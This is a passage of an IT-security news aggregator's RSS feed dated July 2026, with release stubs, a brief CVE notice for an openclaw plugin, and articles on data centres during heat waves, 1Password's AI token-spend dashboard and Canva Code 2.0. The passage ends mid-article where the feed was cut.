<content:encoded><![CDATA[<p>Release publish tooling for OpenClaw 2026.7.2-beta.1 retry</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/bb1a7e506927-20260715]]></title>
<description><![CDATA[OpenClaw v2026.7.2-beta.1 publish tooling]]></description>
<link>https://tsecurity.de/de/3670089/downloads/release-publishbb1a7e506927-20260715/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670089/downloads/release-publishbb1a7e506927-20260715/</guid>
<pubDate>Wed, 15 Jul 2026 11:02:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw v2026.7.2-beta.1 publish tooling</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How data centers cope with heat waves]]></title>
<description><![CDATA[Europe is sweltering. The summer of 2026 has seen historic heat waves that have taken a significant toll on infrastructure. In recent weeks, across the continent, problems have been reported in the power grid, telecommunications, and rail transportation. IT infrastructure has not been spared from...]]></description>
<link>https://tsecurity.de/de/3669125/it-security-nachrichten/how-data-centers-cope-with-heat-waves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669125/it-security-nachrichten/how-data-centers-cope-with-heat-waves/</guid>
<pubDate>Tue, 14 Jul 2026 22:52:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Europe is sweltering. The summer of 2026 has seen historic heat waves that have taken a significant toll on infrastructure. In recent weeks, across the continent, problems have <a href="https://www.bbc.com/news/articles/cj0gez6d50ro" target="_blank" rel="noreferrer noopener">been reported</a> in the power grid, telecommunications, and rail transportation. IT infrastructure has not been spared from the situation.</p>



<p class="wp-block-paragraph">“The heat affects equipment long before anyone notices a problem,” explains Ricardo Román, sales director at Fracttal, in an email. “Every piece of equipment has a temperature range within which it is designed to operate, and when it operates above that range, it begins to degrade silently,” he says. A process of wear and tear begins that will eventually take its toll. With technology, this happens much faster. “In a data center, this effect is amplified because there’s no margin for error,” he notes. When something starts to fail, everything grinds to a halt.</p>



<p class="wp-block-paragraph">In fact, this latest heat wave has already had negative impacts on data centers outside of Spain. In the United Kingdom, high temperatures shut down hospital data centers and <a href="https://www.lavanguardia.com/neo/ia/20260707/11586247/ola-calor-deja-fuera-combate-mayores-superordenadores-ia-1-000-hervidores-agua-funcionando-vez.html" target="_blank" rel="noreferrer noopener">caused</a> the University of Cambridge’s Dawn supercomputer to go offline, as its cooling systems were unable to cope with the temperatures. That’s the crux of the problem. “In IT, heat isn’t a computing problem—it’s a problem of maintaining the assets that support the data center,” explains Román. </p>



<p class="wp-block-paragraph">Heat thus becomes yet another risk for the IT industry and, in particular, for data centers. </p>



<p class="wp-block-paragraph">Temperatures are a clear and growing concern when it comes to corporate risk prevention. “I see it in conversations with clients: In the past, the maintenance team was the one monitoring the temperature in a technical room,” Román says. “Today, management also monitors it, because they know that if that goes down, the service goes down—and behind the service is the end customer,” he adds. Maintenance has gone from being a cost “to a lever for business continuity that no one dares to touch.”</p>



<p class="wp-block-paragraph">As a World Economic Forum analysis warns, we’re experiencing a boom in AI-driven <a href="https://www.computerworld.es/article/4166490/especial-centros-de-datos-2026.html">data centers</a>, but the impact of climate risks on them is being overlooked. Their estimates <a href="https://www.weforum.org/stories/climate-action/data-centres-3-3-trillion-question-heat-cooling/">suggest</a> these risks could result in an additional annual cost of $81 billion by 2035 and $168 billion by 2065. These calculations include all kinds of threats, such as floods or droughts, but most of the impact comes from extreme heat.</p>



<p class="wp-block-paragraph">These projections are confirmed by data from the industry itself: Over the past three years, extreme weather events <a href="https://www.cnbc.com/2026/06/29/ai-data-centers-heatwave-climate-risk-weather.html" target="_blank" rel="noreferrer noopener">have accounted for</a> one-third of the losses incurred by the U.S. division of the data center company Zurich. According to projections by the climate risk analysis firm First Street, 79% of global data centers will face increased risks from extreme weather. MapleCroft estimated in 2025 that 56% of major data centers had a high or very high risk rating for extreme heat, and that <a href="https://www.cio.com/article/4041210/las-olas-de-calor-pueden-poner-en-jaque-a-los-centros-de-datos.html" target="_blank">this figure would rise to 80% by 2080</a>.</p>



<p class="wp-block-paragraph">These percentages cannot be easily extrapolated to Europe in general—and to Spain in particular—as one might think, although they do make the trend clear. Guillermo Benito, CTO of Nabiax, points out during a video call that these studies are based on global samples and thus place significant weight on the capacity of Asia and the United States. “We represent a small percentage there, but that said, all countries will have to adapt. The two major challenges for data centers are energy and cooling,” Benitonotes.</p>



<h2 class="wp-block-heading">Spain: A pioneer in heat?</h2>



<p class="wp-block-paragraph">In late June, French Labor Minister Jean-Pierre Farandou <a href="https://www.france24.com/es/minuto-a-minuto/20260630-francia-quiere-estudiar-el-modelo-espa%C3%B1ol-para-adaptar-la-sociedad-al-calor-extremo" target="_blank" rel="noreferrer noopener">proposed</a> taking a training course in Spain to learn how to prevent high temperatures from paralyzing a country. Although Spain’s climate varies by region, high summer temperatures are common in many areas (though climate change has made them more extreme and frequent in recent years), and the infrastructure of knowledge and solutions that Farandou wanted to learn about has been established. The big question is whether this also applies to data centers. Is Spain better prepared than other European regions?</p>



<p class="wp-block-paragraph">“Heat waves are becoming increasingly intense and frequent. What used to happen once every two years now happens two, three, or four times a year,” Benito says. Speaking from his own experience, he adds: “In Spain, data centers already take these factors into account.” When it comes to redundancy, monitoring, or maintenance, these factors are already factored in. “It’s not like it’s an unforeseen event. It’s already been taken into account, and we build in a lot of redundancy—a wide safety margin,” he says.</p>



<p class="wp-block-paragraph">The difference compared to central or northern Europe is that some haven’t considered this possibility. Benito points out that the same thing happens with homes. “For many years, they’ve been designing with two assumptions: that they have plenty of water because their climates are humid, and that it never gets hot,” he says. And this is a problem, because their summer temperatures have risen significantly during extreme heat waves. “Temperatures in the UK have gone up by 10 or 15 degrees, and their data centers aren’t prepared for that,” he says. In fact, he shares an anecdote about “a certain hyperscaler that, a few years ago, when its data centers in the United Kingdom went down, held a global conference to figure out how this had happened and draw lessons from it.” The curious thing is that what they learned was something that was already well known in Spain.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/ismail-enes-ayhan-lVZjvw-u9V8-unsplash.jpg?quality=50&amp;strip=all&amp;w=1024" alt="centro de datos" class="wp-image-4094600" width="1024" height="589" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">İsmail Enes Ayhan | Unsplash</p></div>



<p class="wp-block-paragraph">It was already getting hot in southern Europe, and preparations were needed. Now, temperatures are becoming a topic of conversation outside the region, and climate change has made its way into IT strategy. Benito confirms that, yes, the conversation is more visible in global settings. “For several reasons. The first is because, obviously, it affects operations. Another is the market. Customers also demand that you address this.” Before, the focus was on power capacity and square meters. Now, the expert points out, people are asking where the electricity comes from and whether it’s clean, and they’re demanding emissions guarantees. The sector is making significant investments to become sustainable, he argues.</p>



<p class="wp-block-paragraph">Beyond consumption data and the improvements that can be made, the big question is whether these high temperatures are already impacting decision-making—whether decisions on where to locate data centers (or not) are already being made with heat in mind.</p>



<p class="wp-block-paragraph">Industry representatives explain that while the climate can have an impact and is already taken into account when deciding where to locate a data center, it is not yet the sole factor or the most decisive one. In other words, many other factors must be considered, and these carry much more weight in the decision-making process. One such factor is energy, which is essential for these infrastructures and must be constant, resilient, and have a low carbon footprint. It is also an area where cooling plays a major role. As Román points out, cooling can account for between 30 and 40% of energy consumption, “and in poorly managed facilities, that figure approaches 50%.” Energy efficiency and cooling efficiency are thus essential—and not just for sustainability reasons. “It’s a matter of the bottom line.”</p>



<p class="wp-block-paragraph">Another factor is space. As Benito says, you need “stable locations where you can grow.” This isn’t just about whether the infrastructure <em>fits</em>, but also about how it aligns with the needs of its customers. As this expert points out, the concentration of data centers near Madrid or Barcelona isn’t “just a whim,” but because you need to be close to large population centers to provide them with low latency. “Other supercomputing applications can be located farther away, and that’s already happening,” he explains, but generally speaking, you can’t just put data centers anywhere. You have to strike a balance between needs and available space.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"></blockquote>



<h2 class="wp-block-heading">How to survive the heat</h2>



<p class="wp-block-paragraph">So, how can we survive the heat, especially when projections suggest that the future will bring even higher temperatures? The key is to understand that this is no longer a curiosity or an occasional incident. As Román points out, air-conditioning systems are running longer and longer. What worked 10 years ago will now barely suffice—it’s “pushed to its limits.” “Heat is shifting from being an August blip to a variable that must be monitored year-round. One you endure; the other you manage.”</p>



<p class="wp-block-paragraph">“By the time the room’s thermometer rises, it’s already too late. What you need to monitor isn’t the room—it’s the equipment—and you have to do it sooner,” he says. Román recommends a three-step strategy. First, don’t measure the environment; instead, measure the equipment and its variations in temperature, vibrations, and energy consumption. Next, take action on any deviations: Don’t wait for a failure, but instead act on early indicators that things aren’t normal. And finally, keep a comprehensive record of historical data, which will be key to anticipating issues and learning from them. “And here I’m going to be honest, because this is what I see every day: The technology to do all this already exists and isn’t expensive,” he asserts. “Many critical facilities are still managed using an Excel spreadsheet and the memory of a technician who’s been there for twenty years,” he warns. And that’s a problem.</p>



<p class="wp-block-paragraph">In the specific case of data centers, Spain has done its homework. The high temperatures (which exceeded those recorded in the United Kingdom, where some data centers did shut down) did not bring them to a halt during this heat wave.</p>



<p class="wp-block-paragraph">Unlike what might happen in other countries, Spain has optimized its cooling systems to be efficient and sustainable, as Benito explains, noting that the country must also contend with water stress. “In other countries, I can use water and let it evaporate as I please because I know it’s going to rain again—or at least that was the case until recently. In Spain, we’ve known for a long time that this isn’t the case,” he says. That’s why we work with closed-loop systems. “Most of us operators don’t use any water,” he says. The same water, mixed with certain cooling agents, circulates continuously. “Once the loop is filled, we don’t lose a single drop,” he asserts.</p>



<p class="wp-block-paragraph">What this expert is now seeing at international conferences is that in other countries where water wasn’t an apparent problem, people are starting to talk about working this way—”as a technical innovation.” “That’s where we say, ‘Yes, just like the ones we have in Spain or Portugal,’” he remarks with a touch of humor. “Water, like energy, is a challenge,” he says, so everything has already been designed with that in mind. It isn’t wasted, it doesn’t evaporate, and it isn’t consumed, he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.2-beta.1]]></title>
<description><![CDATA[OpenClaw 2026.7.2-beta.1]]></description>
<link>https://tsecurity.de/de/3668787/downloads/v202672-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668787/downloads/v202672-beta1/</guid>
<pubDate>Tue, 14 Jul 2026 19:31:53 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.2-beta.1</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62188 | openclaw feishu up to 2026.6.8 Permission Tools improper authorization (CNNVD-2026-98294010)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in openclaw feishu up to 2026.6.8. The affected element is an unknown function of the component Permission Tools. The manipulation leads to improper authorization.

This vulnerability is uniquely identified as CVE-2026-62188. The a...]]></description>
<link>https://tsecurity.de/de/3668612/sicherheitsluecken/cve-2026-62188-openclaw-feishu-up-to-202668-permission-tools-improper-authorization-cnnvd-2026-98294010/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668612/sicherheitsluecken/cve-2026-62188-openclaw-feishu-up-to-202668-permission-tools-improper-authorization-cnnvd-2026-98294010/</guid>
<pubDate>Tue, 14 Jul 2026 18:17:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/openclaw:feishu">openclaw feishu up to 2026.6.8</a>. The affected element is an unknown function of the component <em>Permission Tools</em>. The manipulation leads to improper authorization.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-62188">CVE-2026-62188</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[1Password moves into AI cost management, betting that token spend is the next enterprise budget crisis]]></title>
<description><![CDATA[1Password on Tuesday launched AI Spend and Consumption Management, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including Anthropic, Cursor, and OpenAI.The ...]]></description>
<link>https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</guid>
<pubDate>Tue, 14 Jul 2026 15:32:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://1password.com/">1Password</a> on Tuesday launched <a href="https://1password.com/product/saas-manager">AI Spend and Consumption Management</a>, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a>.</p><p>The move marks the latest strategic expansion for a company that built its reputation on password management for consumers and, over the past three years, has aggressively repositioned itself as a broader identity security and SaaS governance platform for enterprise buyers. With this release, 1Password is staking a claim in one of enterprise technology's newest and most chaotic budget categories: the consumption-based cost of large language models.</p><p>"Executives want teams to build faster with AI, but that speed is creating a new kind of spending pressure," Greg Henry, 1Password's chief financial officer, said in an exclusive interview with VentureBeat. "Developers are consuming tokens at a pace that traditional budgets weren't built to manage, and IT and finance teams are being asked to forecast and justify AI investments without a clear view of what's actually driving costs."</p><p>The product, now in public preview with broad availability planned for fall 2026, connects directly to vendor admin APIs to pull token-level consumption data daily. It normalizes that data across providers into a single dashboard and allows organizations to set vendor-level spend limits, configure threshold-based alerts via Slack and email, and break down usage by team, user, vendor, and model.</p><div></div><h2><b>Why traditional software budgets can't keep up with AI token pricing</b></h2><p>The core challenge <a href="https://1password.com/">1Password</a> is targeting is structural. Traditional SaaS pricing operates on a per-seat, per-year model that is easy to budget and reconcile. AI pricing does not. Every API call to <a href="https://claude.ai/">Claude</a>, <a href="https://openai.com/index/gpt-5-6/">GPT-5.6</a>, or a <a href="https://cursor.com/docs/api">Cursor-powered coding assistant</a> consumes tokens, and the cost of those tokens varies by model, by input versus output, and by the complexity of the task. A single engineering team running agentic workflows can burn through a prepaid token budget in weeks — and the finance team may not notice until the invoice arrives.</p><p>Henry drew a sharp analogy to a problem enterprises have already lived through once. "Consumption-based pricing isn't new," he said. "We saw it arrive with cloud infrastructure, and it took years to build the tools and disciplines to manage it. AI is the next version of that shift."</p><p>That comparison resonates across the industry. When <a href="https://aws.amazon.com/">Amazon Web Services</a>, <a href="https://azure.microsoft.com/en-us">Microsoft Azure</a>, and <a href="https://cloud.google.com/">Google Cloud</a> popularized consumption-based pricing for compute and storage in the 2010s, enterprises initially lacked the tooling to monitor and optimize their cloud bills. That gap spawned an entire FinOps ecosystem — companies like CloudHealth, Spot.io, and Apptio built multi-billion-dollar businesses helping organizations understand what they were spending on cloud and why. Henry is explicitly betting that AI token spend will follow the same trajectory, and that organizations that fail to build visibility now will end up, as he put it, "paying far more than they needed to, for far longer than they should have."</p><p>The scale of the coming wave lends credibility to that bet. Goldman Sachs has estimated that token consumption from AI agents alone will grow 24 times by 2030, a projection driven by the expectation that autonomous AI systems will increasingly execute multi-step workflows — booking travel, writing and deploying code, managing customer service interactions — that generate vastly more API calls than a human sitting at a chat interface.</p><h2><b>How 1Password's new dashboard tracks every token across Anthropic, Cursor, and OpenAI</b></h2><p>The new capability extends <a href="https://1password.com/product/saas-manager">1Password SaaS Manager</a>'s existing foundation of application discovery, license management, and spend analytics. It is not a standalone product. Existing SaaS Manager customers can activate it by connecting their supported AI vendor API keys, at which point consumption data flows into a dedicated AI Consumption Management dashboard. Henry confirmed that there is no separate product or add-on fee: "AI Spend and Consumption Management is available to all 1Password SaaS Manager customers."</p><p>The system provides four core functions. First, it aggregates token usage and spend across Anthropic, Cursor, and OpenAI into a single, normalized view — eliminating the need to toggle between three separate vendor dashboards with three different reporting formats. Second, it enables budget controls: organizations can set vendor-level spend limits, configure percentage-based thresholds, and receive automated alerts when prepaid balances approach depletion. Third, it disaggregates consumption by team, user, vendor, and model, allowing finance and IT to understand not just how much is being spent, but where and by whom. Fourth, it situates AI spend within the broader SaaS portfolio, helping organizations see how token costs relate to their total software investment.</p><p>Notably, the system captures consumption regardless of whether a human or an AI agent generated it. "Token consumption is captured at the API level regardless of whether a human or an agent is generating it," Henry explained. "Organizations get the total consumption picture, including the spikes that agent loops can create, which can be some of the hardest usage to catch before it becomes a problem."</p><p>That agent-level visibility matters because autonomous AI systems can generate runaway costs in ways that human users typically cannot. An agentic coding assistant stuck in a retry loop, for example, can consume thousands of dollars in tokens in minutes — with no human in the loop to notice. For now, the product alerts but does not enforce. When asked whether 1Password will eventually give organizations the ability to automatically cut off spending when a threshold is crossed, Henry said the company is "actively evaluating" automatic enforcement but emphasized that visibility must come first: "You can't enforce what you can't see."</p><h2><b>The choice of launch partners reveals where enterprise AI budgets are under the most pressure</b></h2><p>The decision to start with <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a> — rather than casting a wider net — reflects where enterprise AI adoption and budget strain are most concentrated right now. Henry said the choice was driven entirely by customer demand. "Anthropic, Cursor, and OpenAI are where we're seeing the highest adoption, and where token consumption can move fast and get ahead of the teams responsible for managing it," he said. The company plans to add additional vendors based on customer demand, API availability, and budget impact, though it has not committed to a specific timeline or vendor list.</p><p>The inclusion of Cursor alongside the two major foundation model providers is telling. <a href="https://cursor.com/">Cursor</a>, an AI-powered code editor that has rapidly gained traction among developers, represents a category of AI tool where consumption is particularly difficult to forecast. Unlike a chatbot interface where a user consciously types a prompt, Cursor integrates AI suggestions directly into the development workflow, generating token consumption continuously as developers write code. That ambient, always-on consumption pattern makes it especially prone to budget overruns.</p><p>Henry also addressed who inside an organization should actually own this problem — and acknowledged that the honest answer right now is no one. "When spend is fragmented across vendor dashboards and finance teams are reconciling it monthly, you're always behind," he said. "AI spend can't be treated as a finance-only or IT-only problem." He noted that the pricing differences between models have become significant enough that the choice of which AI model a team uses is now a meaningful financial decision, one that is pulling CFOs into conversations with IT, product, and engineering leaders "in ways they never had to before."</p><p>Steve May, director of IT at ServiceTrade, a 1Password customer that has been using the capability, said it addressed a concrete planning gap. "Forecasting tools for AI consumption and spend was one of our biggest gaps in planning because we didn't have a reliable way to track it," May said. He added that the visibility has "prevented overages that would have cost far more to fix after the fact."</p><h2><b>Where 1Password fits in the fast-consolidating SaaS management market</b></h2><p>1Password is not the only company racing to solve the AI cost management problem, but the competitive landscape is still fragmented and the category is far from mature.</p><p><a href="https://zylo.com/">Zylo</a>, a SaaS management platform that Gartner has also recognized as a leader in the space, published its <a href="https://zylo.com/news/2026-saas-management-index">2026 SaaS Management Index</a> in January showing that AI-native application spend surged 393% year over year in organizations with more than 10,000 employees and 108% overall. Zylo's data also revealed that ChatGPT has become the most expensed application in enterprise environments, highlighting how AI tools are entering organizations through employee credit cards and expense reports — outside formal procurement and governance workflows. Zylo has added its own token-level cost tracking for AI vendors including Anthropic, OpenAI, Cursor, and Perplexity.</p><p>Meanwhile, according to a comparison published by <a href="https://coommit.com/blog/saas-management-platforms-2026-zylo-vs-vendr-vs-sastrify">Coommit</a> in May, <a href="https://www.vendr.com/">Vendr</a> — which focuses more on SaaS negotiation than discovery — tracks AI tools at the contract level but does not yet offer consumption-level visibility. And the FinOps Foundation reported in its 2026 State of FinOps survey that 98% of organizations now actively manage AI costs, up from just 31% in 2024. The broader SaaS management market is also consolidating rapidly. In May, Deel acquired Sastrify, a German SaaS management vendor, and began folding it into its HR platform — a signal that SaaS management capabilities are increasingly being absorbed into adjacent enterprise platforms rather than remaining standalone products.</p><p>1Password's approach differs from pure-play SaaS management competitors in one important respect: it is building AI cost management on top of an identity security platform, not a FinOps or procurement tool. The company's SaaS Manager product grew out of its 2025 acquisition of Trelica, a UK-based SaaS access management startup whose technology enabled the discovery of unsanctioned applications — so-called shadow IT. As BetaKit reported at the time of that deal, 1Password co-CEO Jeff Shiner described Trelica as "a pioneer in modern SaaS access management" and said the acquisition would accelerate 1Password's Extended Access Management product roadmap by more than a year. CRN noted that Trelica brought more than 300 SaaS integrations to the platform. That identity-first lineage gives 1Password a natural advantage in connecting spend data to specific users and teams — a linkage that matters when the question shifts from "how much are we spending on AI?" to "who is spending it, and is it delivering value?"</p><h2><b>From password manager to platform company: 1Password's $6.8 billion bet on enterprise identity</b></h2><p>The launch raises a question that Henry addressed head-on: whether a company that started as a consumer password manager can credibly compete in enterprise AI cost management.</p><p>"It doesn't feel like a stretch to us. It feels like a natural progression," he said. "For more than 20 years, 1Password has evolved alongside how our customers work. We started by protecting passwords. Then we helped organizations manage secrets, control access, and get visibility into the applications their teams rely on."</p><p>The company's evolution has been rapid. 1Password raised a $620 million Series C in January 2022 led by ICONIQ Growth, <a href="https://news.crunchbase.com/venture/1password-620m-round-cybersecurity-investor/">reaching a $6.8 billion valuation</a> — at the time, the largest funding round ever raised by a Canadian company, according to Crunchbase. The round also attracted celebrity investors including Ryan Reynolds, Scarlett Johansson, and Robert Downey Jr. As of early 2025, BetaKit reported that 1Password had surpassed $250 million in annual recurring revenue, with B2B sales accounting for nearly three-quarters of total revenue and the company claiming to be cash-flow positive.</p><p>In May 2024, 1Password launched <a href="https://1password.com/extended-access-management">Extended Access Management</a>, a platform designed to secure sign-ins across both managed and unmanaged applications and devices. That same year, it acquired Kolide for device trust and, in early 2025, Trelica for SaaS discovery. In June 2026, Gartner named 1Password a Leader in its Magic Quadrant for SaaS Management Platforms. According to 1Password's own blog post on the recognition, its SaaS Manager now supports over 400 integrations and provides visibility into a library of more than 40,000 pre-populated application profiles. Each step has moved the company further from its consumer roots and deeper into enterprise infrastructure. The AI Spend and Consumption Management launch extends that trajectory into financial operations territory — a domain where 1Password will compete not only with SaaS management vendors but potentially with dedicated FinOps platforms and the AI vendors' own billing dashboards.</p><h2><b>Why high AI token consumption doesn't always mean wasted money</b></h2><p>Perhaps the most revealing part of Henry's commentary concerns what organizations should actually do with the consumption data once they have it. He pushed back forcefully against the assumption that high token consumption automatically signals waste.</p><p>"A team burning through tokens may be building something genuinely valuable," he said. "A lower-usage project might not be moving the business forward at all. What matters is whether that consumption is producing enough business value to justify the spend."</p><p>Henry drew a distinction between personal productivity — "having a bot summarize your meeting or draft a quick email" — and genuine business outcomes. "What organizations need to see is where consumption is actually driving revenue, efficiency, or something that moves the needle."</p><p>That framing positions AI Spend and Consumption Management not just as a cost-cutting tool but as a decision-support system for AI investment allocation. If a CFO can see that one engineering team's heavy Claude usage is powering a product feature that drives revenue, while another team's OpenAI spend is funding low-value internal automation, the organization can reallocate budget accordingly rather than imposing across-the-board cuts.</p><p>"When costs rise faster than expected, the instinct is to cut," Henry said. "But most organizations can't yet tell which teams, models, or tools are responsible for the increase, so they end up cutting across the board rather than directing investment toward the AI projects that are actually delivering business value. Blunt cuts on a technology you're counting on for competitive advantage is not a management strategy, it's a missed opportunity."</p><h2><b>The next enterprise budget crisis is already here — and it's priced per token</b></h2><p>The product's current scope — three vendor integrations, alerting but not enforcement — is clearly a starting point. Henry signaled that automatic spend limits are on the roadmap and that additional vendor integrations will follow based on customer demand.</p><p>But the broader trajectory he described suggests 1Password sees this launch as a wedge into a much larger opportunity. "As traditional SaaS products add AI capabilities, their pricing models are going to follow," he said. "Organizations that build visibility and management discipline around consumption now are going to be in a much better position when that happens across the rest of their software portfolio."</p><p>If Henry is right, the chaos currently confined to AI token budgets is not a temporary growing pain but a preview of how all enterprise software will eventually be priced. A decade ago, companies scrambled to understand their cloud bills. Today, they are scrambling to understand their AI bills. The question is whether the organizations building the dashboards this time around can get ahead of the curve — or whether, as Henry warned, they will end up where so many companies ended up with cloud, realizing too late how much they were overpaying, and for how long.</p><p>AI Spend and Consumption Management is <a href="https://1password.com/lp/saas-manager">available now in public preview</a> for 1Password SaaS Manager customers. Broad availability is planned for fall 2026.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Canva launches Code 2.0, offering AI website building to every user — including free accounts]]></title>
<description><![CDATA[Canva on Tuesday launched Canva Code 2.0, a major upgrade to its AI-powered coding tool that lets users build interactive websites, apps, and experiences using plain-language prompts — and then edit the results as easily as tweaking a Canva presentation. The feature is now available to all of the...]]></description>
<link>https://tsecurity.de/de/3668119/it-nachrichten/canva-launches-code-20-offering-ai-website-building-to-every-user-including-free-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668119/it-nachrichten/canva-launches-code-20-offering-ai-website-building-to-every-user-including-free-accounts/</guid>
<pubDate>Tue, 14 Jul 2026 15:32:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.canva.com/">Canva</a> on Tuesday launched <a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a>, a major upgrade to its AI-powered coding tool that lets users build interactive websites, apps, and experiences using plain-language prompts — and then edit the results as easily as tweaking a Canva presentation. The feature is now available to all of the company's more than 265 million monthly users across every pricing tier, including free accounts.</p><p>The move is Canva's most aggressive push yet into the fast-growing "vibe coding" market, a category that barely existed 18 months ago but has already minted billion-dollar startups and reshaped how non-developers think about building software. But where rivals like <a href="https://lovable.dev/">Lovable</a>, <a href="https://replit.com/">Replit</a>, and <a href="https://bolt.new/">Bolt.new</a> have focused primarily on generating functional code from text prompts, Canva is making a different bet: that the real bottleneck isn't creating the code — it's making the output actually look good.</p><p>"Most vibe coding tools stop at functional — generating output that looks the same as everyone else's," Canva states in its announcement. "You might get a working prototype, but making it actually look like yours requires a complex editing surface, a separate design tool, a developer, or endless back-and-forth prompting that rarely lands where you want it.”</p><p>Danny Wu, Canva's Head of AI Products, framed the product's positioning in stark terms during an exclusive interview with VentureBeat ahead of the launch.</p><p>"We are deliberately targeting non-technical users," Wu said. "Canva Code isn't a tool we're building for developers. What we're trying to do is bring the power of AI coding — and really lightweight coding — into the Canva platform, while answering our users' requests for more interactivity, more customization, and more flexibility, from websites to interactive presentations."</p><h3><b>Canva Code 2.0 brings drag-and-drop editing, HTML import, and 75% faster generation to AI-built websites</b></h3><p>The update introduces several capabilities designed to collapse the distance between generating code and publishing a polished interactive experience. Users can now create Canva Code projects directly inside other design projects — embedding interactive elements within a whiteboard, presentation deck, or standalone page. <a href="https://www.canva.com/">Canva</a> has also added more than 50 new templates specifically designed for interactive designs, along with the ability to import raw HTML files from other AI coding tools and convert them into editable Canva designs.</p><p>The performance improvements are significant. Canva says it has reduced average code generation time by 75 percent and cut the median time from initial prompt to a published site by 30 percent. The company also reports that integrating <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> into the broader Canva editor — allowing users to treat coded outputs like any other design element — has increased active Code users by 25 percent.</p><p>Perhaps the most distinctive feature is the editing experience itself. Unlike most AI coding platforms, which require users to re-prompt or modify raw code to make visual changes, <a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a> lets users click directly into generated elements to change text, drag and drop images from Canva's built-in library of over 120 million templates and assets, update colors and fonts through a familiar toolbar, or select a specific element and refine it through conversational AI. Every output is fully interactive and automatically adapts to different screen sizes, with a built-in mobile preview.</p><p>Wu demonstrated the drag-and-drop editing during the interview, showing how a generated conference website could be modified in real time — swapping in photos, changing fonts to branded alternatives, and editing text directly on the canvas. "The key differentiator with Canva Code is the editability and the kindness of the outputs it generates," he said, though he noted one current limitation: "We don't support moving elements around. You still have to re-prompt for that."</p><h3><b>How Canva plans to compete with Lovable, Replit, and Bolt in the booming AI app builder market</b></h3><p>Canva's entry into vibe coding at this scale arrives at a pivotal moment for the category. According to <a href="https://www.useluminix.com/reports/industry-analysis/vibe-coding-tool-landscape-replit-v0-base44-bolt-lovable-vercel/source/0">market research published by Luminix AI in May 2026</a>, the vibe coding and AI app builder market has reached an estimated $4.7 billion in 2026, with projections pointing toward $12.3 billion by 2027 at roughly 38 percent compound annual growth. The research also estimates that AI-generated code now comprises approximately 41 percent of all code written globally — a figure that would have seemed inconceivable even two years ago.</p><p>The competitive landscape has grown ferocious. <a href="https://lovable.dev/dashboard">Lovable</a>, which focuses on conversational, design-forward app generation for non-technical founders, has achieved what may be the fastest revenue ramp in the category's history — reportedly reaching approximately $400 million in annual recurring revenue by early 2026, according to Luminix's analysis. <a href="https://replit.com/">Replit</a>, which transformed its browser-based IDE into a full vibe-coding engine through successive AI agent releases, has tripled its valuation to $9 billion and is targeting $1 billion in run-rate revenue by the end of 2026, per the same report. <a href="https://bolt.new/">Bolt.new</a>, which runs a full Node.js environment entirely in the browser, scaled from $4 million to $40 million in ARR within months of launching.</p><p>And then there is Canva, which brings something none of those platforms possess: a quarter-billion-user design ecosystem where brands, teams, and individuals already store their visual identities, collaborate on projects, and publish content.</p><p>Wu positioned <a href="https://bolt.new/">Canva Code</a> not as a direct competitor to these developer-focused tools but as something that fills a gap none of them have addressed. "A lot of the requests that we have been getting and the usage we're seeing is actually with using Canva Code not necessarily as just one artifact, but as part of an overall design, the visual communication they're trying to tell," Wu said. "Like when you have a sales deck, you're able to add a calculator, you're able to add a visualizer of what exactly your product does. That's something where an interactive slide can be worth a thousand pictures."</p><h3><b>Why 